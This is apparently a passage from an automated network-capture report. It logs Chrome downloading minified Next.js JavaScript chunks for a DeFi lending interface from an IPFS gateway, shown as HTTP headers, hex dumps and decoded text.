                                                                                                                                                                                                                                                  Data Ascii: ation mode and other tokens can now be used as collateral"})}),r.isIsolated&&y.determineWarningDisplay({debtCeiling:y}),(0,T.jsxs)(A.m6,{gasLimit:E,children:[(0,T.jsx)(A.oD,{symbol:r.symbol,iconSymbol:r.iconSymbol,description:(0,T.jsx)(s.cC,{id:"Supply ba
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 3a 22 52 65 76 69 65 77 20 74 78 22 7d 29 2c 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 3a 6e 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 2c 63 68 69 6c 64 72 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 54 2e 6a 73 78 29 28 61 2e 58 2c 7b 63 68 69 6c 64 72 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 28 30 2c 54 2e 6a 73 78 29 28 4e 2c 52 28 52 28 7b 7d 2c 65 29 2c 7b 7d 2c 7b 75 73 65 72 3a 72 7d 29 29 7d 7d 29 7d 7d 29 7d 29 7d 7d 2c 39 34 36 33 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 64 28 72 2c 7b 41 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 38 30 38 35 34 29 2c 6f 3d 28 74 28 36 37 32 39 34 29 2c 74 28 37 33 39 36 35 29 29 2c
                                                                                                                                                                                                                                                  Data Ascii: :"Review tx"}),underlyingAsset:n.underlyingAsset,children:function(e){return(0,T.jsx)(a.X,{children:function(r){return(0,T.jsx)(N,R(R({},e),{},{user:r}))}})}})})}},94635:function(e,r,t){t.d(r,{A:function(){return A}});var n=t(80854),o=(t(67294),t(73965)),
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 76 2e 76 68 2e 53 57 49 54 43 48 5f 4e 45 54 57 4f 52 4b 2c 65 76 65 6e 74 50 61 72 61 6d 73 3a 7b 61 73 73 65 74 3a 62 7d 7d 7d 29 2c 5f 28 7b 69 73 57 72 6f 6e 67 4e 65 74 77 6f 72 6b 3a 44 2c 6e 61 74 69 76 65 42 61 6c 61 6e 63 65 3a 28 6e 75 6c 6c 3d 3d 3d 28 72 3d 77 5b 6e 2e 68 50 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 61 6d 6f 75 6e 74 29 7c 7c 22 30 22 2c 74 6f 6b 65 6e 42 61 6c 61 6e 63 65 3a 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 77 5b 48 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 61 6d 6f 75 6e 74 29 7c 7c 22 30 22 2c 70 6f 6f 6c 52 65 73 65 72 76 65 3a 48 2c
                                                                                                                                                                                                                                                  Data Ascii: v.vh.SWITCH_NETWORK,eventParams:{asset:b}}}),_({isWrongNetwork:D,nativeBalance:(null===(r=w[n.hP.toLowerCase()])||void 0===r?void 0:r.amount)||"0",tokenBalance:(null===(t=w[H.underlyingAsset.toLowerCase()])||void 0===t?void 0:t.amount)||"0",poolReserve:H,


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  59192.168.2.549769209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC504OUTGET /_next/static/chunks/3866.777e7d128e9a4375.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 34035
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreibn6v52bzslcovuztjuw4q2bh7btgjlzkvi433le2q73otqjsatxi"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/3866.777e7d128e9a4375.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreibn6v52bzslcovuztjuw4q2bh7btgjlzkvi433le2q73otqjsatxi
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028478
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 33 35 64 33 61 31 38 63 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4235d3a18c4-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 38 36 36 5d 2c 7b 35 30 30 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 76 61 72 20 6e 3d 74 28 35 39 34 39 39 29 2c 6f 3d 74 28 34 37 33 30 29 2c 61 3d 74 28 39 31 36 35 35 29 2c 69 3d 74 28 33 30 31 32 30 29 2c 73 3d 74 28 32 39 36 33 30 29 2c 63 3d 28 74 28 36 37 32 39 34 29 2c 74 28 37 33 39 36 35 29 29 2c 6c 3d 74 28 34 31 30 32 34 29 2c 75 3d 74 28 38 35 38 39 33 29 2c 64 3d 5b 22 6d 69 6e 56 61 6c 22 2c 22 6d 61 78 56 61 6c 22 2c 22 70 65 72 63 65 6e 74 56 61 72 69 61 6e 74 22 2c 22 68 79 70 68 65 6e 56 61 72 69 61 6e 74 22 5d
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3866],{50020:function(e,r,t){var n=t(59499),o=t(4730),a=t(91655),i=t(30120),s=t(29630),c=(t(67294),t(73965)),l=t(41024),u=t(85893),d=["minVal","maxVal","percentVariant","hyphenVariant"]
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 78 28 7b 63 6f 6d 70 61 63 74 3a 21 30 2c 70 65 72 63 65 6e 74 3a 21 30 2c 76 61 6c 75 65 3a 79 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 76 61 72 69 61 6e 74 3a 6e 75 6c 6c 21 3d 3d 6e 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 22 68 33 22 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 70 79 22 7d 2c 6d 29 29 3a 28 30 2c 75 2e 6a 73 78 73 29 28 75 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 75 2e 6a 73 78 29 28 6c 2e 42 2c 78 28 7b 63 6f 6d 70 61 63 74 3a 21 30 2c 76 61 6c 75 65 3a 31 30 30 2a 79 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 76 61 72 69 61 6e 74 3a 6e 75 6c 6c 21 3d 3d 6e 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 22 68 33 22 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 70 79 2d 67 68 6f 2d 66
                                                                                                                                                                                                                                                  Data Ascii: x({compact:!0,percent:!0,value:y,visibleDecimals:2,variant:null!==n&&void 0!==n?n:"h3","data-cy":"apy"},m)):(0,u.jsxs)(u.Fragment,{children:[(0,u.jsx)(l.B,x({compact:!0,value:100*y,visibleDecimals:2,variant:null!==n&&void 0!==n?n:"h3","data-cy":"apy-gho-f
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 69 6e 74 65 72 65 73 74 2c 20 69 6e 63 6c 75 64 69 6e 67 20 64 69 73 63 6f 75 6e 74 20 66 6f 72 20 53 74 61 6b 69 6e 67 20 7b 30 7d 41 41 56 45 20 69 6e 20 53 61 66 65 74 79 20 4d 6f 64 75 6c 65 2e 22 2c 76 61 6c 75 65 73 3a 7b 30 3a 43 3f 28 30 2c 76 2e 6a 73 78 73 29 28 76 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 76 2e 6a 73 78 29 28 64 2e 42 2c 7b 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65 61 64 65 72 32 22 2c 76 61 6c 75 65 3a 5a 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 7d 29 2c 22 20 22 5d 7d 29 3a 6e 75 6c 6c 7d 7d 29 2c 22 20 22 2c 28 30 2c 76 2e 6a 73 78 29 28 70 2e 72 55 2c 7b 6f 6e 43 6c 69 63 6b 3a 6a 2c 68 72 65 66 3a 79 2c 75 6e 64 65 72 6c 69 6e 65 3a 22 61 6c 77 61 79 73 22 2c 76 61 72 69 61 6e 74
                                                                                                                                                                                                                                                  Data Ascii: interest, including discount for Staking {0}AAVE in Safety Module.",values:{0:C?(0,v.jsxs)(v.Fragment,{children:[(0,v.jsx)(d.B,{variant:"subheader2",value:Z,visibleDecimals:2})," "]}):null}})," ",(0,v.jsx)(p.rU,{onClick:j,href:y,underline:"always",variant
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 28 65 2c 72 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3a 7b 7d 3b 72 25 32 3f 6c 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 28 30 2c 6e 2e 5a 29 28 65 2c 72 2c 74 5b 72 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69
                                                                                                                                                                                                                                                  Data Ascii: (e,r).enumerable}))),t.push.apply(t,n)}return t}function u(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?l(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperti
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 74 29 29 3a 69 28 4f 62 6a 65 63 74 28 74 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 6f 2e 5a 2c 73 28 73 28 7b 7d 2c 65 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65
                                                                                                                                                                                                                                                  Data Ascii: OwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):i(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}var c=function(e){return(0,a.jsx)(o.Z,s(s({},e),{},{childre
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 3d 3d 3d 72 2e 63 6f 6c 6f 72 26 26 7b 63 6f 6c 6f 72 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 7d 2c 22 69 6e 68 65 72 69 74 22 3d 3d 3d 72 2e 63 6f 6c 6f 72 26 26 7b 63 6f 6c 6f 72 3a 22 69 6e 68 65 72 69 74 22 7d 2c 21 72 2e 64 69 73 61 62 6c 65 47 75 74 74 65 72 73 26 26 7b 70 61 64 64 69 6e 67 4c 65 66 74 3a 31 36 2c 70 61 64 64 69 6e 67 52 69 67 68 74 3a 31 36 7d 2c 72 2e 69 6e 73 65 74 26 26 7b 70 61 64 64 69 6e 67 4c 65 66 74 3a 37 32 7d 2c 21 72 2e 64 69 73 61 62 6c 65 53 74 69 63 6b 79 26 26 7b 70 6f 73 69 74 69 6f 6e 3a 22 73 74 69 63 6b 79 22 2c 74 6f 70 3a 30 2c 7a 49 6e 64 65 78 3a 31 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74
                                                                                                                                                                                                                                                  Data Ascii: ===r.color&&{color:(e.vars||e).palette.primary.main},"inherit"===r.color&&{color:"inherit"},!r.disableGutters&&{paddingLeft:16,paddingRight:16},r.inset&&{paddingLeft:72},!r.disableSticky&&{position:"sticky",top:0,zIndex:1,backgroundColor:(e.vars||e).palet
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 72 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 6d 65 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3a 7b 7d 3b 72 25 32 3f 78 65 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 28 30 2c 6e 2e 5a 29 28 65 2c 72 2c 74 5b 72 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                  Data Ascii: urn Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function me(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?xe(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnProp
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 65 29 7d 29 2c 5b 41 5d 29 3b 76 61 72 20 76 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 28 30 2c 4c 2e 5a 29 28 5f 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 72 2c 6e 2c 6f 2c 61 2c 69 2c 73 2c 63 2c 75 2c 70 3b 72 65 74 75 72 6e 20 5f 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 69 66 28 65 2e 70 72 65 76 3d 30 2c 21 47 7c 7c 21 71 29 7b 65 2e 6e 65 78 74 3d 32 39 3b 62 72 65 61 6b 7d 69 66 28 72 3d 28 30 2c 48 2e 73 6d 29 28 74 2c 6c 2e 64 65 63 69 6d 61 6c 73 2c 2e 32 35 29 2c 21 4a 7c 7c 21 78 65 29 7b 65 2e 6e 65 78 74 3d 31 35 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 6f 3d 4d
                                                                                                                                                                                                                                                  Data Ascii: e)}),[A]);var ve=function(){var e=(0,L.Z)(_().mark((function e(){var r,n,o,a,i,s,c,u,p;return _().wrap((function(e){for(;;)switch(e.prev=e.next){case 0:if(e.prev=0,!G||!q){e.next=29;break}if(r=(0,H.sm)(t,l.decimals,.25),!J||!xe){e.next=15;break}return o=M
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 30 2c 4c 2e 5a 29 28 5f 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 6f 2c 61 2c 69 2c 63 3b 72 65 74 75 72 6e 20 5f 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 65 2e 70 72 65 76 3d 30 2c 5a 28 6d 65 28 6d 65 28 7b 7d 2c 42 29 2c 7b 7d 2c 7b 6c 6f 61 64 69 6e 67 3a 21 30 7d 29 29 2c 65 2e 6e 65 78 74 3d 34 2c 6d 28 29 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 6f 3d 65 2e 73 65 6e 74 2c 61 3d 53 28 7b 70 6f 6f 6c 52 65 73 65 72 76 65 3a 73 2c 74 61 72 67 65 74 52 65 73 65 72 76 65 3a 6c 2c 63 75 72 72 65 6e 74 52 61 74 65 4d 6f 64 65 3a 76 2c 61 6d 6f 75 6e 74 54 6f 52 65 63
                                                                                                                                                                                                                                                  Data Ascii: 0,L.Z)(_().mark((function e(){var o,a,i,c;return _().wrap((function(e){for(;;)switch(e.prev=e.next){case 0:return e.prev=0,Z(me(me({},B),{},{loading:!0})),e.next=4,m();case 4:return o=e.sent,a=S({poolReserve:s,targetReserve:l,currentRateMode:v,amountToRec


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  60192.168.2.549778209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC739OUTGET /_next/static/chunks/4254-ac0dd33f5ae839d3.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 17914
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigkzrygmxak4nbiuiw3iuvjjypdpegb5fcnraloduf4y55nfsqzrq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/4254-ac0dd33f5ae839d3.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreigkzrygmxak4nbiuiw3iuvjjypdpegb5fcnraloduf4y55nfsqzrq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 209551
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 37 61 38 38 36 37 63 66 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e427a8867cf0-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1305INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 32 35 34 5d 2c 7b 33 35 36 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 47 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 38 30 38 35 34 29 2c 61 3d 72 28 31 32 37 39 29 2c 69 3d 72 28 36 32 37 35 33 29 2c 73 3d 72 28 39 31 34 34 29 2c 6f 3d 72 28 33 30 31 32 30 29 2c 63 3d 72 28 39 30 31 34 39 29 2c 75 3d 72 28 35 36 33 37 31 29 2c 6c 3d 72 28 36 37 32 39 34 29 2c 64 3d 72 28 35 39 34 39 39 29 2c 70 3d 72 28 33 36 38 36 34 29 2c 66 3d 72 28 34 39 35 30 31 29 2c 76
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4254],{35643:function(e,t,r){r.d(t,{g:function(){return G}});var n=r(80854),a=r(1279),i=r(62753),s=r(9144),o=r(30120),c=r(90149),u=r(56371),l=r(67294),d=r(59499),p=r(36864),f=r(49501),v
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 53 3d 72 28 33 31 30 30 31 29 2c 49 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 28 30 2c 4f 2e 59 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6a 73 6f 6e 52 70 63 50 72 6f 76 69 64 65 72 7d 29 29 3b 72 65 74 75 72 6e 28 30 2c 50 2e 68 29 28 7b 71 75 65 72 69 65 73 3a 65 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 71 75 65 72 79 4b 65 79 3a 53 2e 42 2e 67 61 73 50 72 69 63 65 73 28 65 29 2c 71 75 65 72 79 46 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 28 65 29 2e 67 65 74 46 65 65 44 61 74 61 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 2c 6e 2c 61 2c 69 3d 7b 6c 65 67 61
